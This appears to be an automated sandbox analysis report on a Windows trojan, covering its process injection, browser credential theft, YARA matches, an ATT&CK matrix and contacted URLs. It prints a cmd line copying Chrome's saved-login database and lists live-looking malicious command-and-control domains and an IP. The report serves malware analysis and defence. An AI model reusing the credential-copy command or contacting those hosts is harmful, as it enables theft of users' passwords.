          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe; Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 6_2_00418847 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe; Network Connect: 66.29.149.193 80
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe; Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\SysWOW64\mstsc.exe; Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6BF500000 value starts with: 4D5A
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe; Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe; Section loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe; Section loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exe; Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exe; Section loaded: NULL target: C:\Program Files\Internet Explorer\iexplore.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exe; Section loaded: NULL target: C:\Program Files\Internet Explorer\iexplore.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exe; Section loaded: NULL target: C:\Program Files (x86)\Internet Explorer\iexplore.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exe; Section loaded: NULL target: C:\Program Files (x86)\Internet Explorer\iexplore.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exe; Section loaded: NULL target: C:\Program Files (x86)\Internet Explorer\iexplore.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exe; Section loaded: NULL target: C:\Program Files (x86)\Internet Explorer\iexplore.exe protection: execute and read and write
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe; Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonly
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe; Thread register set: target process: 2580
          Source: C:\Windows\SysWOW64\mstsc.exe; Thread register set: target process: 2580
          Source: C:\Windows\SysWOW64\mstsc.exe; Thread register set: target process: 3916
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe; Section unmapped: C:\Program Files (x86)\Internet Explorer\iexplore.exe base address: 400000
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe; Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 300000
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe; Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe; Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 401000
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe; Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 2EA7008
          Source: C:\Windows\SysWOW64\mstsc.exe; Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6BF500000
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
          Source: C:\Windows\SysWOW64\mstsc.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
          Source: C:\Windows\SysWOW64\mstsc.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe; Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6
          Source: explorer.exe, 00000005.00000002.4158354686.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1759741913.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1766227290.0000000009815000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000002.4158354686.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1757982641.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4161000809.000001BA5AC90000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.1757634242.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4157091607.0000000001240000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: 1Progman$
          Source: explorer.exe, 00000005.00000002.4158354686.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1757982641.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4161000809.000001BA5AC90000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000002.4158354686.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1757982641.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4161000809.000001BA5AC90000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: }Program Manager
          Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 6_2_004165E0 GetLocaleInfoW,wcsncmp
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe; Queries volume information: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe VolumeInformation
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
          Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 6_2_00417751 GetSystemTime,SystemTimeToFileTime,GetLastError
          Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 6_2_003A2831 GetUserNameExW,GetLastError,GetLastError,GetUserNameExW,GetLastError,SetLastError,LoadLibraryExW,GetLastError,GetProcAddress,GetLastError,NetApiBufferFree,FreeLibrary
          Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 6_2_003992B6 memset,GetVersionExW,GetLastError,GetLastError
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: Amcache.hve.4.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.4.dr; Binary or memory string: msmpeng.exe
          Source: Amcache.hve.4.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.4.dr; Binary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          Source: Yara match | File source: 1.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21ce007acc8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdfff5038.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdffee3a0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
          Source: C:\Windows\SysWOW64\mstsc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

          Remote Access Functionality

          Source: Yara match | File source: 1.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21ce007acc8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdfff5038.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdffee3a0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 6_2_003A44EC LocalAlloc,CreateWellKnownSid,GetLastError,RpcBindingSetAuthInfoExW,LocalFree,RpcBindingFree,6_2_003A44EC
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 6_2_003A85B1 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcStringFreeW,6_2_003A85B1
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 6_2_003A873B RpcBindingSetAuthInfoExW,LocalFree,RpcBindingSetAuthInfoExW,RpcBindingFree,6_2_003A873B
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 6_2_00378C82 socket,setsockopt,bind,setsockopt,setsockopt,setsockopt,listen,WSAEventSelect,WSAEventSelect,6_2_00378C82
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 6_2_003A3E64 memset,GetCurrentProcessId,ProcessIdToSessionId,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,RpcBindingFree,6_2_003A3E64
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 5 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | 1 Shared Modules | 11 Registry Run Keys / Startup Folder | 712 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | 11 Registry Run Keys / Startup Folder | 3 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | 2 Command and Scripting Interpreter | Login Hook | Login Hook | 1 Timestomp | NTDS | 126 System Information Discovery | Distributed Component Object Model | 1 Email Collection | 15 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Query Registry | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 251 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Virtualization/Sandbox Evasion | DCSync | 3 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 712 Process Injection | Proc Filesystem | 2 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 11 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
          IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
          [Behavior graph] Behavior Graph ID: 1447829, Sample: #U0426#U0438#U0442#U0430#U0..., Startdate: 27/05/2024, Architecture: WINDOWS, Score: 100

          Source | Detection | Scanner | Label | Link
          #U0426#U0438#U0442#U0430#U0442#U0430.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.Leonem |
          #U0426#U0438#U0442#U0430#U0442#U0430.exe | 59% | Virustotal | | Browse
          #U0426#U0438#U0442#U0430#U0442#U0430.exe | 100% | Avira | TR/AD.Swotter.yqbdl |
          No Antivirus matches
          No Antivirus matches
          Name | Malicious | Antivirus Detection | Reputation
          http://www.venitro.com/gy14/?4hIPNj=ilRqsC1g3aUEJHka8Jma3lqF5WsAbY+cTH5DMxQwz5LOdoWk4LwX5JfhUkb7yokX1OUh&3f=_jAPZR | true | Avira URL Cloud: phishing | unknown
          https://code.jquery.com/jquery-3.6.3.min.js | false | Avira URL Cloud: safe | unknown
          http://www.venitro.com/gy14/ | true | Avira URL Cloud: phishing | unknown
          • Avira URL Cloud: safe
          unknown
          http://search.ebay.com/favicon.ico(iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.mrbmed.com/gy14/iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://www.0854n5.shopiexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation=ItemSeaiexplore.exe, 0000000D.00000003.2086552760.000001BA5D6A6000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/desktop-shape.pngiexplore.exe, 0000001D.00000002.4160602763.0000000000880000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4220999092.000000000AB8D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.afc9b4502f5cf6f88cca.js&6iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.camelpmkrf.com/gy14/www.mtdiyx.xyzexplorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDkXDiexplore.exe, 0000001D.00000002.4223084652.000000000AC80000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://msk.afisha.ru/iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/favicon.icoKiexplore.exe, 0000000D.00000002.4167657208.000001BA5D446000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.camelpmkrf.com/gy14/explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/favicon.icoGiexplore.exe, 0000000D.00000002.4167657208.000001BA5D446000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://assets.msn.com/content/v1/cms/api/amp/Document/BBI4MeJ?format=jsonNXiexplore.exe, 0000001D.00000002.4160602763.00000000007F7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://busca.igbusca.com.br//app/static/images/favicon.icoiexplore.exe, 0000000D.00000003.2086552760.000001BA5D6A6000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/?ocid=iehp/fwlink/p/?LinkId=255141eriexplore.exe, 0000000D.00000002.4167657208.000001BA5D338000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000003.3106960387.000000000C974000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3109005574.000000000C9AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3108691424.000000000C9A1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1769871733.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.buflitr.com/gy14/www.venitro.comiexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.ya.com/favicon.icoiexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.etmall.com.tw/favicon.icoiexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/?ocid=iehpSMiexplore.exe, 0000000E.00000002.4171695825.00000000063E9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/function()%7Breturna8diexplore.exe, 0000001D.00000002.4233183546.000000000B640000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://it.search.dada.net/favicon.icoiexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://cgi.search.biglobe.ne.jp/favicon.icoiexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://buscar.ozu.es/iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/favicon.icokiexplore.exe, 0000000D.00000002.4158143738.000000A69A9F6000.00000004.00000001.00020000.00000000.sdmpfalse
            unknown
            http://www.ampsportss.com/gy14/iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            unknown
            http://www.artbydianayorktownva.com/gy14/www.accepted6.comiexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.ask.com/iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://www.cbssports.com/mlb/news/yankees-rotation-sets-unique-pitching-mark-despite-not-having-aceiexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.883831.comReferer:explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.msn.com/iexplore.exe, 0000000E.00000002.4179072726.0000000006A15000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4184443900.0000000006AF7000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.google.it/iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4236083961.000000000CEF5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
